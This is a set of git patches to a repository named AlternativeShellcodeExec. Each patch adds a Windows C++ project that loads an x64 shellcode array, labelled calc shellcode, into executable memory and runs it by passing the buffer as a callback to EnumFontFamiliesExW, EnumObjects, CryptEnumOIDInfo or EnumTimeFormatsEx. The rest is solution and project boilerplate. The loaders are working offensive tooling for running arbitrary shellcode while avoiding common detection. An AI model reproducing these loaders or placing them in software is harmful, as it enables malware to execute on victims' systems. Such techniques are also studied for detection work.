[PATCH 21/28] ... --- AlternativeShellcodeExec.sln | 10 ++ EnumFontFamiliesExW/EnumFontFamiliesExW.cpp | 45 ++++++ .../EnumFontFamiliesExW.vcxproj | 147 ++++++++++++++++++ .../EnumFontFamiliesExW.vcxproj.filters | 22 +++ 4 files changed, 224 insertions(+) create mode 100644 EnumFontFamiliesExW/EnumFontFamiliesExW.cpp create mode 100644 EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj create mode 100644 EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index c0e72e7..8a4972a 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -77,6 +77,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontsW", "EnumFontsW\En EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontFamiliesW", "EnumFontFamiliesW\EnumFontFamiliesW.vcxproj", "{383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontFamiliesExW", "EnumFontFamiliesExW\EnumFontFamiliesExW.vcxproj", "{F169F79E-D307-4EA9-818D-8C8FF5B7138D}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -381,6 +383,14 @@ Global {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Release|x64.Build.0 = Release|x64 {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Release|x86.ActiveCfg = Release|Win32 {383AB5C3-DDA6-49AA-B3AC-4F8A63CC7460}.Release|x86.Build.0 = Release|Win32 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Debug|x64.ActiveCfg = Debug|x64 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Debug|x64.Build.0 = Debug|x64 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Debug|x86.ActiveCfg = Debug|Win32 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Debug|x86.Build.0 = Debug|Win32 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Release|x64.ActiveCfg = Release|x64 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Release|x64.Build.0 = Release|x64 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Release|x86.ActiveCfg = Release|Win32 + {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumFontFamiliesExW/EnumFontFamiliesExW.cpp b/EnumFontFamiliesExW/EnumFontFamiliesExW.cpp new file mode 100644 index 0000000..14e252c --- /dev/null +++ b/EnumFontFamiliesExW/EnumFontFamiliesExW.cpp @@ -0,0 +1,45 @@ +#include +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + + LOGFONTW lf = { 0 }; + lf.lfCharSet = DEFAULT_CHARSET; + + + HDC dc = GetDC(NULL); + EnumFontFamiliesExW(dc, &lf, (FONTENUMPROCW)address, NULL, NULL); + + return 0; + +} \ No newline at end of file diff --git a/EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj b/EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj new file mode 100644 index 0000000..b83f5d3 --- /dev/null +++ b/EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {f169f79e-d307-4ea9-818d-8c8ff5b7138d} + EnumFontFamiliesExW + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj.filters b/EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj.filters new file mode 100644 index 0000000..814edce --- /dev/null +++ b/EnumFontFamiliesExW/EnumFontFamiliesExW.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From e1de09c5f9113e437ba9330c60636ce98a558463 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Mon, 3 May 2021 22:32:55 -0400 Subject: [PATCH 22/28] Getting tired of this project ngl -_- --- AlternativeShellcodeExec.sln | 10 ++ EnumObjects/EnumObjects.cpp | 45 ++++++++ EnumObjects/EnumObjects.vcxproj | 147 ++++++++++++++++++++++++ EnumObjects/EnumObjects.vcxproj.filters | 22 ++++ 4 files changed, 224 insertions(+) create mode 100644 EnumObjects/EnumObjects.cpp create mode 100644 EnumObjects/EnumObjects.vcxproj create mode 100644 EnumObjects/EnumObjects.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 8a4972a..ece02b3 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -79,6 +79,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontFamiliesW", "EnumFo EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontFamiliesExW", "EnumFontFamiliesExW\EnumFontFamiliesExW.vcxproj", "{F169F79E-D307-4EA9-818D-8C8FF5B7138D}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumObjects", "EnumObjects\EnumObjects.vcxproj", "{D3788A6D-E9D8-44FF-B368-B42BC341C8F5}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -391,6 +393,14 @@ Global {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Release|x64.Build.0 = Release|x64 {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Release|x86.ActiveCfg = Release|Win32 {F169F79E-D307-4EA9-818D-8C8FF5B7138D}.Release|x86.Build.0 = Release|Win32 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Debug|x64.ActiveCfg = Debug|x64 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Debug|x64.Build.0 = Debug|x64 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Debug|x86.ActiveCfg = Debug|Win32 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Debug|x86.Build.0 = Debug|Win32 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Release|x64.ActiveCfg = Release|x64 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Release|x64.Build.0 = Release|x64 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Release|x86.ActiveCfg = Release|Win32 + {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumObjects/EnumObjects.cpp b/EnumObjects/EnumObjects.cpp new file mode 100644 index 0000000..5a1465f --- /dev/null +++ b/EnumObjects/EnumObjects.cpp @@ -0,0 +1,45 @@ +#include +#include + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + + LOGFONTW lf = { 0 }; + lf.lfCharSet = DEFAULT_CHARSET; + + + HDC dc = GetDC(NULL); + EnumObjects(dc, OBJ_BRUSH, (GOBJENUMPROC)address, NULL); + + return 0; + +} \ No newline at end of file diff --git a/EnumObjects/EnumObjects.vcxproj b/EnumObjects/EnumObjects.vcxproj new file mode 100644 index 0000000..3627fce --- /dev/null +++ b/EnumObjects/EnumObjects.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {d3788a6d-e9d8-44ff-b368-b42bc341c8f5} + EnumObjects + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumObjects/EnumObjects.vcxproj.filters b/EnumObjects/EnumObjects.vcxproj.filters new file mode 100644 index 0000000..6f31026 --- /dev/null +++ b/EnumObjects/EnumObjects.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 54a3844db258ebf78a571b38a757968fad2b0875 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Thu, 6 May 2021 19:40:50 -0400 Subject: [PATCH 23/28] Added CryptEnumOIDInfo --- AlternativeShellcodeExec.sln | 10 ++ CryptEnumOIDInfo/CryptEnumOIDInfo.cpp | 44 ++++++ CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj | 147 ++++++++++++++++++ .../CryptEnumOIDInfo.vcxproj.filters | 22 +++ 4 files changed, 223 insertions(+) create mode 100644 CryptEnumOIDInfo/CryptEnumOIDInfo.cpp create mode 100644 CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj create mode 100644 CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index ece02b3..1614824 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -81,6 +81,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumFontFamiliesExW", "Enum EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumObjects", "EnumObjects\EnumObjects.vcxproj", "{D3788A6D-E9D8-44FF-B368-B42BC341C8F5}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CryptEnumOIDInfo", "CryptEnumOIDInfo\CryptEnumOIDInfo.vcxproj", "{D21641FB-1935-4ED9-B511-BC80F00B733F}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -401,6 +403,14 @@ Global {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Release|x64.Build.0 = Release|x64 {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Release|x86.ActiveCfg = Release|Win32 {D3788A6D-E9D8-44FF-B368-B42BC341C8F5}.Release|x86.Build.0 = Release|Win32 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Debug|x64.ActiveCfg = Debug|x64 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Debug|x64.Build.0 = Debug|x64 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Debug|x86.ActiveCfg = Debug|Win32 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Debug|x86.Build.0 = Debug|Win32 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Release|x64.ActiveCfg = Release|x64 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Release|x64.Build.0 = Release|x64 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Release|x86.ActiveCfg = Release|Win32 + {D21641FB-1935-4ED9-B511-BC80F00B733F}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/CryptEnumOIDInfo/CryptEnumOIDInfo.cpp b/CryptEnumOIDInfo/CryptEnumOIDInfo.cpp new file mode 100644 index 0000000..6ed4b53 --- /dev/null +++ b/CryptEnumOIDInfo/CryptEnumOIDInfo.cpp @@ -0,0 +1,44 @@ +#include +#include +#include + +#pragma comment(lib, "Crypt32.lib") + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + + CryptEnumOIDInfo(NULL, NULL, NULL, (PFN_CRYPT_ENUM_OID_INFO)address); + + + return 0; + +} \ No newline at end of file diff --git a/CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj b/CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj new file mode 100644 index 0000000..25f5b4b --- /dev/null +++ b/CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {d21641fb-1935-4ed9-b511-bc80f00b733f} + CryptEnumOIDInfo + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj.filters b/CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj.filters new file mode 100644 index 0000000..5123c51 --- /dev/null +++ b/CryptEnumOIDInfo/CryptEnumOIDInfo.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file From 8b979a421a0b51e9a6360f025e69b387bab64b69 Mon Sep 17 00:00:00 2001 From: S4R1N Date: Fri, 7 May 2021 22:56:40 -0400 Subject: [PATCH 24/28] Anotha one --- AlternativeShellcodeExec.sln | 10 ++ EnumTimeFormatsEx/EnumTimeFormatsEx.cpp | 42 +++++ EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj | 147 ++++++++++++++++++ .../EnumTimeFormatsEx.vcxproj.filters | 22 +++ 4 files changed, 221 insertions(+) create mode 100644 EnumTimeFormatsEx/EnumTimeFormatsEx.cpp create mode 100644 EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj create mode 100644 EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj.filters diff --git a/AlternativeShellcodeExec.sln b/AlternativeShellcodeExec.sln index 1614824..bd08621 100644 --- a/AlternativeShellcodeExec.sln +++ b/AlternativeShellcodeExec.sln @@ -83,6 +83,8 @@ Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumObjects", "EnumObjects\ EndProject Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CryptEnumOIDInfo", "CryptEnumOIDInfo\CryptEnumOIDInfo.vcxproj", "{D21641FB-1935-4ED9-B511-BC80F00B733F}" EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EnumTimeFormatsEx", "EnumTimeFormatsEx\EnumTimeFormatsEx.vcxproj", "{5007CFB3-4072-4B23-9FF9-BDE0B75286F1}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|x64 = Debug|x64 @@ -411,6 +413,14 @@ Global {D21641FB-1935-4ED9-B511-BC80F00B733F}.Release|x64.Build.0 = Release|x64 {D21641FB-1935-4ED9-B511-BC80F00B733F}.Release|x86.ActiveCfg = Release|Win32 {D21641FB-1935-4ED9-B511-BC80F00B733F}.Release|x86.Build.0 = Release|Win32 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Debug|x64.ActiveCfg = Debug|x64 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Debug|x64.Build.0 = Debug|x64 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Debug|x86.ActiveCfg = Debug|Win32 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Debug|x86.Build.0 = Debug|Win32 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Release|x64.ActiveCfg = Release|x64 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Release|x64.Build.0 = Release|x64 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Release|x86.ActiveCfg = Release|Win32 + {5007CFB3-4072-4B23-9FF9-BDE0B75286F1}.Release|x86.Build.0 = Release|Win32 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE diff --git a/EnumTimeFormatsEx/EnumTimeFormatsEx.cpp b/EnumTimeFormatsEx/EnumTimeFormatsEx.cpp new file mode 100644 index 0000000..86f70c6 --- /dev/null +++ b/EnumTimeFormatsEx/EnumTimeFormatsEx.cpp @@ -0,0 +1,42 @@ +#include +#include +#include + +#pragma comment(lib, "Crypt32.lib") + +// alfarom256 calc shellcode +unsigned char op[] = +"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" +"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" +"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" +"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" +"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" +"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" +"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" +"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" +"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" +"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" +"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" +"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" +"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" +"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" +"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" +"\x63\x2e\x65\x78\x65\x00"; + + + + +int main() { + + + LPVOID address = VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(address, &op[0], sizeof(op)); + + EnumTimeFormatsEx((TIMEFMT_ENUMPROCEX)address, LOCALE_NAME_SYSTEM_DEFAULT, TIME_NOSECONDS, NULL); + + return 0; + +} \ No newline at end of file diff --git a/EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj b/EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj new file mode 100644 index 0000000..bd75cd0 --- /dev/null +++ b/EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj @@ -0,0 +1,147 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 16.0 + Win32Proj + {5007cfb3-4072-4b23-9ff9-bde0b75286f1} + EnumTimeFormatsEx + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + false + + + true + + + false + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj.filters b/EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj.filters new file mode 100644 index 0000000..10beb25 --- /dev/null +++ b/EnumTimeFormatsEx/EnumTimeFormatsEx.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + 